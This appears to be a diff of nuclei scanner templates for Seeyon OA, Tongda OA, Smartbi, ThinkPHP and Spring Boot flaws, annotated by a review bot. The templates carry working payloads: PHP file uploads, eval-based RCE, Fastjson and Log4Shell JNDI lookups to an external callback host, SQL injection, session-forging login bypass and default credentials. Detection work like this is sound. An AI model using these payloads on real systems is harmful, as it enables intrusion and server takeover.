- https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: secworld
http:
- raw:
- |
POST /?g=obj_app_upfile HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr_3}}
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="upfile"; filename="{{randstr_1}}.php"
Content-Type: text/plain
<?php echo "{{randstr_2}}"; unlink(__FILE__); ?>
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundary{{randstr_3}}--
- |
GET /attachements/{{randstr_1}}.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 302
- status_code_2 == 200 && contains(body_2,'{{randstr_2}}')
condition: and
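Review bot: the hardcoded `__hash__` value `0b9d6b1ab7479ab69d9f71b05e0e9445` is unexplained; add a comment on where it comes from and whether it is per-installation, since a stale value makes the check fail silently. As with the ruijie template, a successful upload (302) followed by a second request that does not execute leaves `{{randstr_1}}.php` in `/attachements/` on the target; a line in `description` saying the check writes a file lets operators decide whether to run it.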

View File

@ -0,0 +1,40 @@
id: seeyon-ajax-unauth
info:
name: Seeyon AJAX Unauthoried Access
author: pikpikcu
severity: high
description: 接口未授权访问可调用文件上传接口上传webshell。
reference:
- https://buaq.net/go-53721.html
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.html
metadata:
verified: true
fofa-query: app="致远互联-OA"
tags: misconfig,seeyon,unauth,ajax
http:
- raw:
- |
POST /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "java.lang.NullPointerException:null")'
- 'status_code_2 == 200 && contains(body_2,"companyName")'
condition: and
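Review bot: `name` has a typo, "Unauthoried" should be "Unauthorized". `description` states the consequence (file upload through the unauthenticated interface) only in Chinese; add an English line so the metadata matches the rest of the template.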

View File

@ -0,0 +1,31 @@
id: seeyon-oa-a6-config-jsp-info-leak
info:
name: seeyon-oa a6 config.jsp user info leak
author: SleepingBag945
severity: medium
description: 致远OA A6 config.jsp 敏感信息泄漏
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "DatabaseName"
- type: word
words:
- "请在文本框内配置传真插件所需服务器的信息"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05
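Review bot: `Content-Type: application/x-www-form-urlencoded` on a bodyless GET is superfluous and should be removed; the same header appears on the other `yyoa` GET requests in this commit.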

View File

@ -0,0 +1,31 @@
id: seeyon-oa-a6-createMysql-user-info-leak
info:
name: seeyon-oa a6 createMysql user info leak
author: SleepingBag945
severity: medium
description: 致远OA A6 createMysql.jsp 数据库敏感信息泄露
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/createMysql.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "root</br>"
- type: regex
regex:
- "[*][0-zA-Z]{40}</br>"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05
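Review bot: the regex `[*][0-zA-Z]{40}</br>` uses the range `0-z`, which spans ASCII 0x30 to 0x7A and therefore also matches `:;<=>?@[\]^_` and the backtick; a MySQL native password hash is `*` followed by 40 uppercase hexadecimal characters, so `[*][0-9A-F]{40}</br>` is both tighter and what the description intends.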

View File

@ -0,0 +1,31 @@
id: seeyon-oa-a6_initDataAssess-user-info-leak
info:
name: seeyon-oa a6 initDataAssess user info leak
author: SleepingBag945
severity: medium
description: 致远OA A6 initDataAssess.jsp 用户敏感信息泄露
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/assess/js/initDataAssess.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "personList"
- type: word
words:
- "personHash.Add"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

View File

@ -0,0 +1,29 @@
id: seeyon-oa-a6-setextno-sqli
info:
name: seeyon-oa a6 setextno sqli
author: SleepingBag945
severity: high
description: 致远OA A6 setextno.jsp SQL注入漏洞
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "请填写以下用户的传真分机号"
- type: status
status:
- 200
# /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#
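Review bot: the matchers only verify that `setextno.jsp` is reachable and renders its form text; they never exercise the `user_ids` parameter, so the template cannot tell a patched install from an unpatched one and `severity: high` is not supported by what it checks. Either test the parameter in the request with an error-based matcher like the other sqli templates here, or downgrade this to an exposure check with an honest description.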

View File

@ -0,0 +1,32 @@
id: seeyon-oa-a8-default-login
info:
name: seeyon-oa A8 default login
author: SleepingBag945
severity: high
description: 致远(seeyon)OA A8+企业版存在弱口令漏洞,可利用该漏洞登陆后台
tags: seeyon,oa
http:
- raw:
- |
POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 75
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
UserAgentFrom=iphone&login_username=audit-admin&login_password=seeyon123456
matchers-condition: and
matchers:
- type: word
words:
- "\"LoginOK\":\"ok\""
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

View File

@ -0,0 +1,44 @@
id: seeyon-oa-a8-m-information-disclosure
info:
name: seeyon-oa-m a8 information-disclosure
author: SleepingBag945
severity: medium
description: 致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击,攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
tags: seeyon,oa
http:
- raw:
- |
POST /seeyon/management/index.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
password=WLCCYBD%40SEEYON
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/seeyon/management/status.jsp"
- type: word
part: header
words:
- "Set-Cookie"
- type: status
status:
- 302
# Enhanced by cs on 2022/07/05
# 登录后通过如下url访问敏感信息
# /seeyon/management/status.jsp
# /seeyon/logs/login.log
# /seeyon/logs/v3x.log
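Review bot: this is a password-based login (`password=WLCCYBD%40SEEYON` against `/seeyon/management/index.jsp`), so `id` and `tags` should say default-login rather than information-disclosure; the disclosure in `description` happens afterwards through the pages listed in the trailing comments. `description` is also overlong for what is checked: a redirect to `status.jsp` plus a `Set-Cookie` establishes a successful login and nothing more.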

View File

@ -0,0 +1,28 @@
id: seeyon-oa-fastjson-rce
info:
name: seeyon-oa fastjson rce
author: SleepingBag945
severity: critical
description: 致远OA Fastjson 远程代码执行
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa,rce,fastjson
http:
- raw:
- |
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# Enhanced by cs on 2022/07/05
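Review bot: a `dns` hit on interactsh proves that the server resolved the LDAP hostname in `dataSourceName`, i.e. that the JNDI lookup was attempted; say that in `description` (currently just "致远OA Fastjson 远程代码执行") so a match is not read as confirmed code execution. `matchers-condition: and` is redundant with a single matcher.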

View File

@ -0,0 +1,28 @@
id: seeyon-oa-log4jshell
info:
name: seeyon-oa log4jshell
author: SleepingBag945
severity: critical
description: 致远OA Log4jShell
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa,rce
http:
- raw:
- |
POST /seeyon/main.do?method=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# Enhanced by cs on 2022/07/05
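Review bot: in `login.timezone=GMT+8:00` the `+` is a form-encoded space, so the server receives `GMT 8:00`; encode it as `%2B` if the value matters, or drop the unused fields. As in the fastjson template, the `dns` callback only shows that the lookup was attempted, which `description` should state.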

View File

@ -0,0 +1,29 @@
id: seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload
info:
name: seeyon-oa sp2 wpsAssistServlet arbitrary file upload
author: SleepingBag945
severity: critical
description: 致远OA SP2 wpsAssistServlet 任意文件上传
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html
tags: seeyon,oa
http:
- raw:
- |
GET /seeyon/wpsAssistServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "\"data\":\"flag is empty\""
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05
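Review bot: the matchers only confirm that `/seeyon/wpsAssistServlet` answers with `"data":"flag is empty"`, i.e. that the servlet exists; no upload is attempted, so this is an endpoint-exposure check and `severity: critical` together with 任意文件上传 in `name` overstates what a match proves. Rename and downgrade it, or document that a hit means "servlet present, manual verification required".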

View File

@ -0,0 +1,26 @@
id: shiziyu-cms-apicontroller-sqli
info:
name: shiziyu-cms-apicontroller-sqli
author: SleepingBag945
severity: high
description: |
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨导致SQL注入漏洞
metadata:
fofa-query: body="/seller.php?s=/Public/login"
tags: sqli
http:
- raw:
- |
GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
matchers:
- type: dsl
dsl:
- 'status_code_1 == 404 && contains(body_1,"c4ca4238a0b923820dcc509a6f75849") && contains(body_1,"syntax error")'
condition: and
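Review bot: add a comment explaining the two non-obvious constants in the dsl: why `status_code_1 == 404` is the expected code, and why the hash is the 31-character `c4ca4238a0b923820dcc509a6f75849` rather than the full md5 of `1` (the XPATH error text produced by updatexml is limited to 32 characters, one of which is the leading `~`). Without that, the next maintainer will "fix" the hash to 32 characters and break the matcher.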

View File

@ -0,0 +1,33 @@
id: smartbi-default-user
info:
name: smartbi - Default user weakpass
author: unknown
severity: high
description: |
Smartbi default user weakpass.
reference:
- https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511
tags: smartbi
http:
- raw:
- |
POST /smartbi/vision/RMIServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
className=UserService&methodName=loginFromDB&params=["system","0a"]
- |
POST /vision/RMIServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
className=UserService&methodName=loginFromDB&params=["system","0a"]
matchers:
- type: word
words:
- '"result":true'
part: body
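Review bot: `author: unknown` should be resolved before merge, and the two requests (`/smartbi/vision/RMIServlet` and `/vision/RMIServlet`) are always both sent, so add `stop-at-first-match: true` as the jolokia templates in this change do. The hardcoded `Content-Length: 67` headers are redundant (nuclei computes the length for raw requests) and become wrong the moment the body is edited; remove them.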

View File

@ -0,0 +1,31 @@
id: smartbi-windowunloading-deserialization
info:
name: smartbi - Deserialization vulnerability in the windowunloading interface
author: unknown
severity: critical
description: |
Smartbi Deserialization vulnerability in the windowunloading interface.
reference:
- https://stack.chaitin.com/techblog/detail?id=122
tags: smartbi
http:
- raw:
- |
POST /vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=isLogged&params=[]
- |
POST /smartbi/vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=isLogged&params=[]
matchers:
- type: word
words:
- 'H~CxOm~'
part: body
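Review bot: the `windowUnloading` query value is an opaque percent-encoded blob and the matcher string `'H~CxOm~'` is unexplained, so a maintainer cannot tell what the probe does or why that marker proves the deserialization path was hit; add a comment or `description` sentence stating what the payload is and confirming it is non-destructive. `author: unknown` needs filling in, and `stop-at-first-match: true` is missing although both path variants are tried.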

View File

@ -0,0 +1,33 @@
id: jolokia-logback-jndi-rce
info:
name: jolokia-logback-jndi-rce
author: SleepingBag945
severity: high
reference:
- https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
- https://github.com/laluka/jolokia-exploitation-toolkit
- https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce
tags: jolokia,springboot,tomcat
http:
- method: GET
path:
- "{{BaseURL}}/jolokia/list"
- "{{BaseURL}}/actuator/jolokia/list"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'ch.qos.logback.classic.jmx.JMXConfigurator'
- type: word
part: body
words:
- 'reloadByURL'
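Review bot: there is no `description` at all, and the id `jolokia-logback-jndi-rce` overstates what the template checks: it only confirms that `/jolokia/list` is reachable and advertises `ch.qos.logback.classic.jmx.JMXConfigurator` with `reloadByURL`, i.e. an exposed MBean that could be abused, not an executed RCE. Add a description saying this is an exposure check so triage does not treat hits as confirmed code execution.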

View File

@ -0,0 +1,33 @@
id: jolokia-realm-jndi-rce
info:
name: jolokia Realm JNDI RCE
author: SleepingBag945
severity: high
reference:
- https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
- https://github.com/laluka/jolokia-exploitation-toolkit
- https://github.com/LandGrey/SpringBootVulExploit#0x05jolokia-realm-jndi-rce
tags: jolokia,springboot,tomcat
http:
- method: GET
path:
- "{{BaseURL}}/jolokia/list"
- "{{BaseURL}}/actuator/jolokia/list"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'type=MBeanFactory'
- type: word
part: body
words:
- 'createJNDIRealm'
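Review bot: same gap as the logback variant: no `description`, and the match on `type=MBeanFactory` plus `createJNDIRealm` in the `/jolokia/list` output is an exposure indicator (unauthenticated Jolokia with the Tomcat MBeanFactory listed), not proof of exploitation. Document that, and consider folding both jolokia templates into one, since the paths, `stop-at-first-match` and status matcher are identical and only the two MBean strings differ.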

View File

@ -0,0 +1,49 @@
id: springboot-env-all-check
info:
name: Springboot Env Actuator - Detect
author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish,SleepingBag945
severity: high
description: Sensitive environment variables may not be masked
tags: misconfig,springboot,env,exposure
http:
- method: GET
path:
- "{{BaseURL}}/env"
- "{{BaseURL}}/actuator/env"
- "{{BaseURL}}/1/..;/env"
- "{{BaseURL}}/1/..;/actuator/env"
- "{{BaseURL}}/actuator;/env;"
- "{{BaseURL}}/message-api/actuator/env"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "applicationConfig"
- "activeProfiles"
condition: or
- type: word
part: body
words:
- "server.port"
- "local.server.port"
condition: or
- type: word
part: header
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
- "application/vnd.spring-boot.actuator.v2+json"
- "application/vnd.spring-boot.actuator.v3+json"
condition: or
- type: status
status:
- 200
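Review bot: the path list mixes three kinds of entries without explanation: plain `/env` and `/actuator/env`, the `/1/..;/env` and `/actuator;/env;` forms (path-normalization differences between a front proxy and the Spring backend), and `/message-api/actuator/env`, which is a product-specific context path. Describe the first two groups in `description` and move the vendor-specific path into its own template or a `metadata` note. The description `Sensitive environment variables may not be masked` names a consequence; state what is actually matched (an actuator `env` endpoint answering without authentication).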

View File

@ -0,0 +1,35 @@
id: thinkphp6-lang-lfi
info:
name: Thinkphp Lang - LFI
author: kagamigawa
severity: high
description: |
Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI.可RCE
reference:
- https://tttang.com/archive/1865/
metadata:
verified: true
shodan-query: title:"Thinkphp"
fofa-query: header="think_lang"
tags: thinkphp,lfi
http:
- method: GET
path:
- "{{BaseURL}}/?lang=../../thinkphp/base"
- "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Call Stack'
- 'class="trace'
condition: and
- type: status
status:
- 500
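Review bot: the `description` ends in Chinese (`可RCE`, "can be escalated to RCE") after an English sentence, and the version list `v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24` overlaps itself (`v5.0.x` already covers `v5.0.0~v5.0.24`). Rewrite it as one English sentence with a single range per branch. The `status: 500` plus `Call Stack` and `class="trace` combination is appropriately tight; note in the description that the second path depends on `think-trace` being installed.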

View File

@ -0,0 +1,45 @@
id: tongda-oa-api-ali-arbitrary-file-upload
info:
name: tongda-oa-api-ali-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html
tags: tongda,oa
http:
- raw:
- |
POST /mobile/api/api.ali.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=502f67681799b07e5de6b503655f5cae
Accept-Encoding: gzip
--502f67681799b07e5de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream
{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
--502f67681799b07e5de6b503655f5cae--
- |
GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{trim_prefix(date_time("%Y%M", unix_time()),"20")}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /fb6790f4.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
# req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'status_code_2 == 200 && contains(body_2,"OK")'
- 'status_code_3 == 200 && contains(body_3,"phpinfo")'
condition: and
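Review bot: this template writes a file to the target and never cleans it up: the `fb6790f4.json` payload's base64 decodes to `file_put_contents('../../fb6790f4.php','<?php phpinfo();?>');`, request 3 then fetches `/fb6790f4.php`, and the dropped PHP file remains on the server. Either make the proof file self-removing (the `unlink(__FILE__)` pattern used in the ueditor template of this same change) or state the leftover artifact in `description` so operators can clean it up. Separately, `# req-condition: true` is commented out while the DSL references `status_code_2` and `body_3`; on nuclei releases that do not auto-enable multi-request conditions the matcher never evaluates, so uncomment it or document the minimum engine version.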

View File

@ -0,0 +1,26 @@
id: tongda-oa-getdata-rce
info:
name: tongda-oa-getdata-rce
author: SleepingBag945
severity: critical
description: 通达OA v11.9 getdata接口存在任意命令执行漏洞攻击者通过漏洞可以执行服务器任意命令控制服务器权限
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.9%20getdata%20任意命令执行漏洞.html
tags: tongda,oa,rce
http:
- raw:
- |
GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBqb2R3YWhmb2lhd2ppZm93YWR3Ow==%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "jodwahfoiawjifowadw"
- type: status
status:
- 200
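Review bot: the matcher word `jodwahfoiawjifowadw` is a static marker that is also embedded in the request (`ZWNobyBqb2R3YWhmb2lhd2ppZm93YWR3Ow==` is base64 for `echo jodwahfoiawjifowadw;`); add a comment saying so, because as written a reader cannot tell the marker is the probe's own echo rather than application content. The other rce template in this change uses `{{randstr}}` for the same purpose, which avoids a fixed signature. The description is Chinese-only; provide English.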

View File

@ -0,0 +1,36 @@
id: tongda-oa-getway-remote-file-include-mysql
info:
name: tongda-oa-getway-remote-file-include-mysql
author: SleepingBag945
severity: critical
description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞,利用未授权的文件上传配合任意本地文件包含,攻击者可以轻易的取得 shell 获得系统权限。
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
tags: tongda,oa
http:
- raw:
- |
POST /mac/gateway.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
json={"url":"/general/../../mysql5/my.ini"}
matchers-condition: and
matchers:
- type: word
words:
- "[mysql]"
- type: word
words:
- "default-character-set"
- type: status
status:
- 200
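Review bot: the id and name say `getway` but the request targets `/mac/gateway.php`, and the `description` and `reference` are copied from the log-inclusion variant (they talk about including a log file to obtain a file write) while this template includes `mysql5/my.ini` and matches `[mysql]` and `default-character-set`. Rename to match the real path and write a description of what is actually probed: local file inclusion of the MySQL configuration, which discloses server settings.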

View File

@ -0,0 +1,31 @@
id: tongda-oa-getway-remote-file-include
info:
name: tongda-oa-getway-remote-file-include
author: SleepingBag945
severity: critical
description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
tags: tongda,oa
http:
- raw:
- |
POST /ispirit/interface/gateway.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
json={"url":"/general/../../nginx/logs/oa.access.log"}
matchers-condition: and
matchers:
- type: word
words:
- "ERROR URL"
- type: status
status:
- 200
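Review bot: the only content matcher is the string `ERROR URL` with a 200 status, and nothing explains why that string indicates a successful inclusion of `nginx/logs/oa.access.log`; an error reply from `gateway.php` rejecting the `url` value could plausibly contain the same words, which would flag every non-vulnerable instance. Document the expected response and prefer a marker that only appears in the included log content. The id uses `getway` for a `gateway.php` path, the same inconsistency as the mysql variant.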

View File

@ -0,0 +1,44 @@
id: tongda-oa-header-inc-arbitrary-login
info:
name: tongda-oa-header-inc-arbitrary-login
author: SleepingBag945
severity: high
description: 通达OA是一款OA系统。其旧版本的 header.inc.php 存在认证绕过漏洞,攻击者可构造恶意请求访问 header.inc.php获取cookie后通过身份认证登录后台执行相关敏感操作造成敏感信息泄漏等等。
reference:
- https://github.com/Phuong39/2022-HW-POC/blob/main/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87.md
tags: tongda,oa
http:
- raw:
- |
POST /module/retrieve_pwd/header.inc.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,&_SESSION[LOGIN_USER_PRIV]=1&_SESSION[LOGIN_USER_PRIV_OTHER]=1&_SESSION[LOGIN_USER_PRIV_TYPE]=1&_SESSION[LOGIN_NOT_VIEW_USER]=0&_SESSION[RETRIEVE_PWD_USER]=1
- |
GET /general/index.php HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{cookie}};
extractors:
- type: regex
name: cookie
internal: true
part: header
group: 1
regex:
- 'PHPSESSID=(.*?);'
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(header_1, "Set-Cookie") && contains(header_1,"PHPSESSID")'
